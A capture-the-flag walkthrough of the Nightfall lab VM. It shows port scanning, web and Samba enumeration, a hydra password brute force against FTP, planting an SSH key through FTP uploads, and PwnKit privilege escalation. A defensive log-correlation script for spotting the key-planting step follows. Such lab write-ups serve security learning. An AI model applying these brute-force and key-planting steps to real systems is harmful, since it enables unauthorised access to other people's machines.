Nightfall Walkthrough

To begin, after installing the VM, I ran the command below to find its IP:

sudo netdiscover -r 10.10.10.0/24

Once I found the IP, I began my usual enumeration scans.

sudo nmap -sS -p- -sV 10.10.10.37 --open

sudo nmap -sU 10.10.10.37 --open

From the nmap scans, I discovered the information below:

PORT STATE SERVICE VERSION
21/tcp open ftp pyftpdlib 1.5.5
22/tcp open ssh OpenSSH 7.9p1 Debian 10 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.5.5-10.3.15-MariaDB-1
MAC Address: 08:00:27:64:28:DE (Oracle VirtualBox virtual NIC)
Service Info: Host: NIGHTFALL; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.72 seconds

Seeing port 80 open, I ran the following to enumerate the web interface:

dirb http://10.10.10.37

gobuster dir -u http://10.10.10.37 -x html,txt,php,bak --wordlist=/usr/share/wordlists/dirb/common.txt

nikto -h 10.10.10.37

This turned up nothing useful, as even the webpage itself was the default Apache page.

Looking for another possible avenue, I noticed the machine had Samba shares enabled. I ran the following to enumerate that service:

enum4linux 10.10.10.37

The only shares available were IPC$ and PRINT$, which were inaccessible. However, it did give me some other valuable information: the usernames matt and nightfall.

Using hydra, I attempted to find passwords for these usernames, as well as root, against the MySQL service.

hydra -l matt -P /usr/share/wordlists/rockyou.txt mysql://10.10.10.37:3306

This turned up nothing, so instead I ran the same against the FTP service.

hydra -l matt -P /usr/share/wordlists/rockyou.txt ftp://10.10.10.37

This was fruitful and found the password cheese.

Using this, I was able to connect to the FTP service, which I quickly found was Matt’s home directory. Nothing useful was found in there; however, I did have full access to upload and download.

I created a .ssh directory and, within it, pasted my public SSH key into an authorized_keys file. I then sent this to Matt’s home directory via FTP.

Once done, I could SSH into the machine as Matt without a password.

After my usual enumeration steps, checking for SUID binaries showed that pkexec (part of polkit) was installed SUID on this machine. In addition, the OS is Debian 10. Just as on the previous machine, Dusk, I transferred over PwnKit and ran it to get a root shell.
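From the detection side, the chain above leaves a clear trail: an FTP upload into a user's .ssh directory followed shortly by a public-key SSH login for that same account. The following is an added example (not part of the original walkthrough) that correlates those two events across a pyftpdlib transfer log and sshd's auth.log; the log lines are constructed samples modelled on those two formats, and the one-hour window is an assumption.

```python
import re
from datetime import datetime

# Constructed sample lines modelled on pyftpdlib's transfer log and on
# sshd's "Accepted publickey" auth.log entry (not from the original post).
FTP_LOG = """\
[I 2020-08-10 10:00:01] 10.10.10.5:49152-[matt] STOR /home/matt/notes.txt completed=1 bytes=12 seconds=0.001
[I 2020-08-10 10:00:07] 10.10.10.5:49153-[matt] STOR /home/matt/.ssh/authorized_keys completed=1 bytes=563 seconds=0.002
"""
AUTH_LOG = """\
Aug 10 09:30:00 nightfall sshd[1001]: Accepted password for nightfall from 10.10.10.9 port 40000 ssh2
Aug 10 10:00:40 nightfall sshd[1234]: Accepted publickey for matt from 10.10.10.5 port 50001 ssh2: RSA SHA256:CONSTRUCTED
"""

FTP_STOR = re.compile(r"^\[I (\S+ \S+)\] (\d+\.\d+\.\d+\.\d+):\d+-\[(\w+)\] STOR (\S+) completed=1")
SSH_PUBKEY = re.compile(r"^(\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Accepted publickey for (\w+) from (\d+\.\d+\.\d+\.\d+)")


def ftp_key_uploads(ftp_log):
    """Return (timestamp, user, source_ip, path) for each completed FTP upload into a .ssh directory."""
    hits = []
    for line in ftp_log.splitlines():
        m = FTP_STOR.match(line)
        if m and "/.ssh/" in m.group(4):
            ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
            hits.append((ts, m.group(3), m.group(2), m.group(4)))
    return hits


def correlate(ftp_log, auth_log, year=2020, window_s=3600):
    """Pair each .ssh upload over FTP with a later public-key SSH login by the same user.

    auth.log carries no year, so the caller supplies it (assumed 2020 for the sample)."""
    uploads = ftp_key_uploads(ftp_log)
    alerts = []
    for line in auth_log.splitlines():
        m = SSH_PUBKEY.match(line)
        if not m:
            continue
        login_ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
        for up_ts, up_user, up_ip, path in uploads:
            delta = (login_ts - up_ts).total_seconds()
            if up_user == m.group(2) and 0 <= delta <= window_s:
                alerts.append({"user": up_user, "path": path, "ftp_ip": up_ip,
                               "ssh_ip": m.group(3), "seconds_between": int(delta)})
    return alerts
```

An alert whose ftp_ip and ssh_ip match, as in the sample, is the strongest signal; the mitigation on the FTP side is to deny writes into .ssh (or serve FTP from a directory other than the user's home).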

My apologies for the lack of pictures in this walkthrough; the next ones posted should have more.